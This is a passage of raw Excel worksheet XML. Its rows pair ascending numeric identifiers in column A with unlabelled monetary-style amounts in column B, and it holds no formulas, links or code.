        <v>7200000</v>
      </c>
    </row>
    <row r="501" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A501">
        <v>1418</v>
      </c>
      <c r="B501" s="8">
        <v>192000</v>
      </c>
    </row>
    <row r="502" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A502">
        <v>1430</v>
      </c>
      <c r="B502" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="503" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A503">
        <v>1434</v>
      </c>
      <c r="B503" s="8">
        <v>227000</v>
      </c>
    </row>
    <row r="504" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A504">
        <v>1435</v>
      </c>
      <c r="B504" s="8">
        <v>608300</v>
      </c>
    </row>
    <row r="505" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A505">
        <v>1437</v>
      </c>
      <c r="B505" s="8">
        <v>1250000</v>
      </c>
    </row>
    <row r="506" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A506">
        <v>1443</v>
      </c>
      <c r="B506" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="507" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A507">
        <v>1444</v>
      </c>
      <c r="B507" s="8">
        <v>25550000</v>
      </c>
    </row>
    <row r="508" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A508">
        <v>1445</v>
      </c>
      <c r="B508" s="8">
        <v>270000</v>
      </c>
    </row>
    <row r="509" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A509">
        <v>1446</v>
      </c>
      <c r="B509" s="8">
        <v>28000</v>
      </c>
    </row>
    <row r="510" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A510">
        <v>1447</v>
      </c>
      <c r="B510" s="8">
        <v>1379444</v>
      </c>
    </row>
    <row r="511" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A511">
        <v>1448</v>
      </c>
      <c r="B511" s="8">
        <v>17250</v>
      </c>
    </row>
    <row r="512" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A512">
        <v>1452</v>
      </c>
      <c r="B512" s="8">
        <v>2000000</v>
      </c>
    </row>
    <row r="513" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A513">
        <v>1453</v>
      </c>
      <c r="B513" s="8">
        <v>95000</v>
      </c>
    </row>
    <row r="514" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A514">
        <v>1455</v>
      </c>
      <c r="B514" s="8">
        <v>153000</v>
      </c>
    </row>
    <row r="515" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A515">
        <v>1459</v>
      </c>
      <c r="B515" s="8">
        <v>119000</v>
      </c>
    </row>
    <row r="516" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A516">
        <v>1462</v>
      </c>
      <c r="B516" s="8">
        <v>130000</v>
      </c>
    </row>
    <row r="517" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A517">
        <v>1463</v>
      </c>
      <c r="B517" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="518" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A518">
        <v>1465</v>
      </c>
      <c r="B518" s="8">
        <v>43000</v>
      </c>
    </row>
    <row r="519" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A519">
        <v>1468</v>
      </c>
      <c r="B519" s="8">
        <v>752780.34000000008</v>
      </c>
    </row>
    <row r="520" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A520">
        <v>1469</v>
      </c>
      <c r="B520" s="8">
        <v>252000</v>
      </c>
    </row>
    <row r="521" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A521">
        <v>1470</v>
      </c>
      <c r="B521" s="8">
        <v>6350</v>
      </c>
    </row>
    <row r="522" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A522">
        <v>1478</v>
      </c>
      <c r="B522" s="8">
        <v>925000</v>
      </c>
    </row>
    <row r="523" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A523">
        <v>1487</v>
      </c>
      <c r="B523" s="8">
        <v>6520000</v>
      </c>
    </row>
    <row r="524" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A524">
        <v>1489</v>
      </c>
      <c r="B524" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="525" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A525">
        <v>1490</v>
      </c>
      <c r="B525" s="8">
        <v>81195.7</v>
      </c>
    </row>
    <row r="526" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A526">
        <v>1492</v>
      </c>
      <c r="B526" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="527" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A527">
        <v>1497</v>
      </c>
      <c r="B527" s="8">
        <v>766000</v>
      </c>
    </row>
    <row r="528" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A528">
        <v>1500</v>
      </c>
      <c r="B528" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="529" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A529">
        <v>1502</v>
      </c>
      <c r="B529" s="8">
        <v>1761000</v>
      </c>
    </row>
    <row r="530" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A530">
        <v>1503</v>
      </c>
      <c r="B530" s="8">
        <v>180</v>
      </c>
    </row>
    <row r="531" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A531">
        <v>1507</v>
      </c>
      <c r="B531" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="532" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A532">
        <v>1508</v>
      </c>
      <c r="B532" s="8">
        <v>120000000</v>
      </c>
    </row>
    <row r="533" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A533">
        <v>1509</v>
      </c>
      <c r="B533" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="534" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A534">
        <v>1510</v>
      </c>
      <c r="B534" s="8">
        <v>4248000</v>
      </c>
    </row>
    <row r="535" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A535">
        <v>1512</v>
      </c>
      <c r="B535" s="8">
        <v>1450000</v>
      </c>
    </row>
    <row r="536" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A536">
        <v>1514</v>
      </c>
      <c r="B536" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="537" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A537">
        <v>1515</v>
      </c>
      <c r="B537" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="538" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A538">
        <v>1517</v>
      </c>
      <c r="B538" s="8">
        <v>6000</v>
      </c>
    </row>
    <row r="539" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A539">
        <v>1518</v>
      </c>
      <c r="B539" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="540" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A540">
        <v>1522</v>
      </c>
      <c r="B540" s="8">
        <v>16611000</v>
      </c>
    </row>
    <row r="541" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A541">
        <v>1527</v>
      </c>
      <c r="B541" s="8">
        <v>53249000</v>
      </c>
    </row>
    <row r="542" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A542">
        <v>1531</v>
      </c>
      <c r="B542" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="543" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A543">
        <v>1536</v>
      </c>
      <c r="B543" s="8">
        <v>1750000</v>
      </c>
    </row>
    <row r="544" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A544">
        <v>1543</v>
      </c>
      <c r="B544" s="8">
        <v>300200</v>
      </c>
    </row>
    <row r="545" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A545">
        <v>1554</v>
      </c>
      <c r="B545" s="8">
        <v>220000</v>
      </c>
    </row>
    <row r="546" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A546">
        <v>1556</v>
      </c>
      <c r="B546" s="8">
        <v>1260000</v>
      </c>
    </row>
    <row r="547" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A547">
        <v>1558</v>
      </c>
      <c r="B547" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="548" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A548">
        <v>1559</v>
      </c>
      <c r="B548" s="8">
        <v>33200</v>
      </c>
    </row>
    <row r="549" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A549">
        <v>1565</v>
      </c>
      <c r="B549" s="8">
        <v>486000</v>
      </c>
    </row>
    <row r="550" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A550">
        <v>1568</v>
      </c>
      <c r="B550" s="8">
        <v>55500</v>
      </c>
    </row>
    <row r="551" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A551">
        <v>1570</v>
      </c>
      <c r="B551" s="8">
        <v>1500500</v>
      </c>
    </row>
    <row r="552" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A552">
        <v>1571</v>
      </c>
      <c r="B552" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="553" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A553">
        <v>1574</v>
      </c>
      <c r="B553" s="8">
        <v>442</v>
      </c>
    </row>
    <row r="554" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A554">
        <v>1581</v>
      </c>
      <c r="B554" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="555" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A555">
        <v>1582</v>
      </c>
      <c r="B555" s="8">
        <v>4000000</v>
      </c>
    </row>
    <row r="556" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A556">
        <v>1589</v>
      </c>
      <c r="B556" s="8">
        <v>17000</v>
      </c>
    </row>
    <row r="557" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A557">
        <v>1593</v>
      </c>
      <c r="B557" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="558" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A558">
        <v>1595</v>
      </c>
      <c r="B558" s="8">
        <v>105000</v>
      </c>
    </row>
    <row r="559" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A559">
        <v>1597</v>
      </c>
      <c r="B559" s="8">
        <v>349661</v>
      </c>
    </row>
    <row r="560" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A560">
        <v>1598</v>
      </c>
      <c r="B560" s="8">
        <v>15869047</v>
      </c>
    </row>
    <row r="561" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A561">
        <v>1611</v>
      </c>
      <c r="B561" s="8">
        <v>942000</v>
      </c>
    </row>
    <row r="562" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A562">
        <v>1612</v>
      </c>
      <c r="B562" s="8">
        <v>600000</v>
      </c>
    </row>
    <row r="563" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A563">
        <v>1619</v>
      </c>
      <c r="B563" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="564" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A564">
        <v>1621</v>
      </c>
      <c r="B564" s="8">
        <v>130000</v>
      </c>
    </row>
    <row r="565" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A565">
        <v>1623</v>
      </c>
      <c r="B565" s="8">
        <v>800000</v>
      </c>
    </row>
    <row r="566" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A566">
        <v>1634</v>
      </c>
      <c r="B566" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="567" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A567">
        <v>1637</v>
      </c>
      <c r="B567" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="568" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A568">
        <v>1638</v>
      </c>
      <c r="B568" s="8">
        <v>6912000</v>
      </c>
    </row>
    <row r="569" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A569">
        <v>1639</v>
      </c>
      <c r="B569" s="8">
        <v>1198000</v>
      </c>
    </row>
    <row r="570" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A570">
        <v>1640</v>
      </c>
      <c r="B570" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="571" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A571">
        <v>1641</v>
      </c>
      <c r="B571" s="8">
        <v>12800</v>
      </c>
    </row>
    <row r="572" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A572">
        <v>1644</v>
      </c>
      <c r="B572" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="573" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A573">
        <v>1647</v>
      </c>
      <c r="B573" s="8">
        <v>1050000</v>
      </c>
    </row>
    <row r="574" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A574">
        <v>1650</v>
      </c>
      <c r="B574" s="8">
        <v>11000</v>
      </c>
    </row>
    <row r="575" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A575">
        <v>1653</v>
      </c>
      <c r="B575" s="8">
        <v>550</v>
      </c>
    </row>
    <row r="576" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A576">
        <v>1655</v>
      </c>
      <c r="B576" s="8">
        <v>3586000</v>
      </c>
    </row>
    <row r="577" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A577">
        <v>1658</v>
      </c>
      <c r="B577" s="8">
        <v>60788</v>
      </c>
    </row>
    <row r="578" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A578">
        <v>1663</v>
      </c>
      <c r="B578" s="8">
        <v>691000</v>
      </c>
    </row>
    <row r="579" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A579">
        <v>1667</v>
      </c>
      <c r="B579" s="8">
        <v>25000000</v>
      </c>
    </row>
    <row r="580" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A580">
        <v>1668</v>
      </c>
      <c r="B580" s="8">
        <v>374400</v>
      </c>
    </row>
    <row r="581" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A581">
        <v>1675</v>
      </c>
      <c r="B581" s="8">
        <v>11000000</v>
      </c>
    </row>
    <row r="582" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A582">
        <v>1676</v>
      </c>
      <c r="B582" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="583" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A583">
        <v>1678</v>
      </c>
      <c r="B583" s="8">
        <v>64000</v>
      </c>
    </row>
    <row r="584" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A584">
        <v>1687</v>
      </c>
      <c r="B584" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="585" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A585">
        <v>1689</v>
      </c>
      <c r="B585" s="8">
        <v>83800</v>
      </c>
    </row>
    <row r="586" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A586">
        <v>1690</v>
      </c>
      <c r="B586" s="8">
        <v>284000</v>
      </c>
    </row>
    <row r="587" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A587">
        <v>1691</v>
      </c>
      <c r="B587" s="8">
        <v>951296</v>
      </c>
    </row>
    <row r="588" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A588">
        <v>1699</v>
      </c>
      <c r="B588" s="8">
        <v>453590</v>
      </c>
    </row>
    <row r="589" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A589">
        <v>1700</v>
      </c>
      <c r="B589" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="590" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A590">
        <v>1701</v>
      </c>
      <c r="B590" s="8">
        <v>1296</v>
      </c>
    </row>
    <row r="591" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A591">
        <v>1713</v>
      </c>
      <c r="B591" s="8">
        <v>1602000</v>
      </c>
    </row>
    <row r="592" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A592">
        <v>1714</v>
      </c>
      <c r="B592" s="8">
        <v>16800</v>
      </c>
    </row>
    <row r="593" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A593">
        <v>1715</v>
      </c>
      <c r="B593" s="8">
        <v>116000</v>
      </c>
    </row>
    <row r="594" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A594">
        <v>1720</v>
      </c>
      <c r="B594" s="8">
        <v>570000</v>
      </c>
    </row>
    <row r="595" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A595">
        <v>1721</v>
      </c>
      <c r="B595" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="596" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A596">
        <v>1729</v>
      </c>
      <c r="B596" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="597" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A597">
        <v>1732</v>
      </c>
      <c r="B597" s="8">
        <v>6200000</v>
      </c>
    </row>
    <row r="598" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A598">
        <v>1733</v>
      </c>
      <c r="B598" s="8">
        <v>3000</v>
      </c>
    </row>
    <row r="599" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A599">
        <v>1734</v>
      </c>
      <c r="B599" s="8">
        <v>422000</v>
      </c>
    </row>
    <row r="600" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A600">
        <v>1745</v>
      </c>
      <c r="B600" s="8">
        <v>5600000</v>
      </c>
    </row>
    <row r="601" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A601">
        <v>1746</v>
      </c>
      <c r="B601" s="8">
        <v>153500</v>
      </c>
    </row>
    <row r="602" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A602">
        <v>1748</v>
      </c>
      <c r="B602" s="8">
        <v>131750</v>
      </c>
    </row>
    <row r="603" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A603">
        <v>1756</v>
      </c>
      <c r="B603" s="8">
        <v>303000</v>
      </c>
    </row>
    <row r="604" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A604">
        <v>1758</v>
      </c>
      <c r="B604" s="8">
        <v>350</v>
      </c>
    </row>
    <row r="605" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A605">
        <v>1759</v>
      </c>
      <c r="B605" s="8">
        <v>45000</v>
      </c>
    </row>
    <row r="606" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A606">
        <v>1764</v>
      </c>
      <c r="B606" s="8">
        <v>1830300</v>
      </c>
    </row>
    <row r="607" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A607">
        <v>1767</v>
      </c>
      <c r="B607" s="8">
        <v>75000</v>
      </c>
    </row>
    <row r="608" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A608">
        <v>1768</v>
      </c>
      <c r="B608" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="609" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A609">
        <v>1771</v>
      </c>
      <c r="B609" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="610" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A610">
        <v>1772</v>
      </c>
      <c r="B610" s="8">
        <v>354460</v>
      </c>
    </row>
    <row r="611" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A611">
        <v>1776</v>
      </c>
      <c r="B611" s="8">
        <v>2039700</v>
      </c>
    </row>
    <row r="612" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A612">
        <v>1779</v>
      </c>
      <c r="B612" s="8">
        <v>9920000</v>
      </c>
    </row>
    <row r="613" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A613">
        <v>1781</v>
      </c>
      <c r="B613" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="614" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A614">
        <v>1785</v>
      </c>
      <c r="B614" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="615" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A615">
        <v>1799</v>
      </c>
      <c r="B615" s="8">
        <v>21600000</v>
      </c>
    </row>
    <row r="616" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A616">
        <v>1804</v>
      </c>
      <c r="B616" s="8">
        <v>470000</v>
      </c>
    </row>
    <row r="617" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A617">
        <v>1805</v>
      </c>
      <c r="B617" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="618" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A618">
        <v>1808</v>
      </c>
      <c r="B618" s="8">
        <v>2371369</v>
      </c>
    </row>
    <row r="619" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A619">
        <v>1811</v>
      </c>
      <c r="B619" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="620" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A620">
        <v>1813</v>
      </c>
      <c r="B620" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="621" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A621">
        <v>1821</v>
      </c>
      <c r="B621" s="8">
        <v>144000</v>
      </c>
    </row>
    <row r="622" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A622">
        <v>1823</v>
      </c>
      <c r="B622" s="8">
        <v>952150</v>
      </c>
    </row>
    <row r="623" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A623">
        <v>1835</v>
      </c>
      <c r="B623" s="8">
        <v>1386</v>
      </c>
    </row>
    <row r="624" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A624">
        <v>1840</v>
      </c>
      <c r="B624" s="8">
        <v>50000</v>
      </c>
    </row>
    <row r="625" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A625">
        <v>1842</v>
      </c>
      <c r="B625" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="626" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A626">
        <v>1844</v>
      </c>
      <c r="B626" s="8">
        <v>960000</v>
      </c>
    </row>
    <row r="627" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A627">
        <v>1845</v>
      </c>
      <c r="B627" s="8">
        <v>4937015</v>
      </c>
    </row>
    <row r="628" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A628">
        <v>1846</v>
      </c>
      <c r="B628" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="629" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A629">
        <v>1848</v>
      </c>
      <c r="B629" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="630" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A630">
        <v>1850</v>
      </c>
      <c r="B630" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="631" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A631">
        <v>1852</v>
      </c>
      <c r="B631" s="8">
        <v>1257115.75</v>
      </c>
    </row>
    <row r="632" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A632">
        <v>1854</v>
      </c>
      <c r="B632" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="633" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A633">
        <v>1858</v>
      </c>
      <c r="B633" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="634" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A634">
        <v>1860</v>
      </c>
      <c r="B634" s="8">
        <v>3600000</v>
      </c>
    </row>
    <row r="635" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A635">
        <v>1865</v>
      </c>
      <c r="B635" s="8">
        <v>90</v>
      </c>
    </row>
    <row r="636" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A636">
        <v>1877</v>
      </c>
      <c r="B636" s="8">
        <v>540550</v>
      </c>
    </row>
    <row r="637" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A637">
        <v>1890</v>
      </c>
      <c r="B637" s="8">
        <v>1164000</v>
      </c>
    </row>
    <row r="638" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A638">
        <v>1902</v>
      </c>
      <c r="B638" s="8">
        <v>3645000</v>
      </c>
    </row>
    <row r="639" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A639">
        <v>1912</v>
      </c>
      <c r="B639" s="8">
        <v>210000</v>
      </c>
    </row>
    <row r="640" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A640">
        <v>1915</v>
      </c>
      <c r="B640" s="8">
        <v>2500</v>
      </c>
    </row>
    <row r="641" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A641">
        <v>1939</v>
      </c>
      <c r="B641" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="642" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A642">
        <v>1946</v>
      </c>
      <c r="B642" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="643" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A643">
        <v>1951</v>
      </c>
      <c r="B643" s="8">
        <v>335000</v>
      </c>
    </row>
    <row r="644" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A644">
        <v>1953</v>
      </c>
      <c r="B644" s="8">
        <v>1620000</v>
      </c>
    </row>
    <row r="645" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A645">
        <v>1956</v>
      </c>
      <c r="B645" s="8">
        <v>152000</v>
      </c>
    </row>
    <row r="646" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A646">
        <v>1957</v>
      </c>
      <c r="B646" s="8">
        <v>8640</v>
      </c>
    </row>
    <row r="647" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A647">
        <v>1969</v>
      </c>
      <c r="B647" s="8">
        <v>301435.01</v>
      </c>
    </row>
    <row r="648" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A648">
        <v>1970</v>
      </c>
      <c r="B648" s="8">
        <v>59000</v>
      </c>
    </row>
    <row r="649" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A649">
        <v>1971</v>
      </c>
      <c r="B649" s="8">
        <v>50</v>
      </c>
    </row>
    <row r="650" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A650">
        <v>1973</v>
      </c>
      <c r="B650" s="8">
        <v>6300000</v>
      </c>
    </row>
    <row r="651" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A651">
        <v>1977</v>
      </c>
      <c r="B651" s="8">
        <v>200000</v>
      </c>
    </row>
    <row r="652" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A652">
        <v>1980</v>
      </c>
      <c r="B652" s="8">
        <v>4284000</v>
      </c>
    </row>
    <row r="653" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A653">
        <v>1988</v>
      </c>
      <c r="B653" s="8">
        <v>1430000</v>
      </c>
    </row>
    <row r="654" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A654">
        <v>1989</v>
      </c>
      <c r="B654" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="655" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A655">
        <v>1990</v>
      </c>
      <c r="B655" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="656" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A656">
        <v>1999</v>
      </c>
      <c r="B656" s="8">
        <v>10666000</v>
      </c>
    </row>
    <row r="657" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A657">
        <v>2009</v>
      </c>
      <c r="B657" s="8">
        <v>854013</v>
      </c>
    </row>
    <row r="658" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A658">
        <v>2016</v>
      </c>
      <c r="B658" s="8">
        <v>3012000</v>
      </c>
    </row>
    <row r="659" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A659">
        <v>2021</v>
      </c>
      <c r="B659" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="660" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A660">
        <v>2024</v>
      </c>
      <c r="B660" s="8">
        <v>950000</v>
      </c>
    </row>
    <row r="661" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A661">
        <v>2031</v>
      </c>
      <c r="B661" s="8">
        <v>325000</v>
      </c>
    </row>
    <row r="662" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A662">
        <v>2035</v>
      </c>
      <c r="B662" s="8">
        <v>6550</v>
      </c>
    </row>
    <row r="663" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A663">
        <v>2036</v>
      </c>
      <c r="B663" s="8">
        <v>2400000</v>
      </c>
    </row>
    <row r="664" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A664">
        <v>2046</v>
      </c>
      <c r="B664" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="665" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A665">
        <v>2051</v>
      </c>
      <c r="B665" s="8">
        <v>960000</v>
      </c>
    </row>
    <row r="666" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A666">
        <v>2054</v>
      </c>
      <c r="B666" s="8">
        <v>1100</v>
      </c>
    </row>
    <row r="667" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A667">
        <v>2056</v>
      </c>
      <c r="B667" s="8">
        <v>146800</v>
      </c>
    </row>
    <row r="668" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A668">
        <v>2058</v>
      </c>
      <c r="B668" s="8">
        <v>2150000</v>
      </c>
    </row>
    <row r="669" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A669">
        <v>2064</v>
      </c>
      <c r="B669" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="670" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A670">
        <v>2066</v>
      </c>
      <c r="B670" s="8">
        <v>62000</v>
      </c>
    </row>
    <row r="671" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A671">
        <v>2068</v>
      </c>
      <c r="B671" s="8">
        <v>1028650</v>
      </c>
    </row>
    <row r="672" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A672">
        <v>2075</v>
      </c>
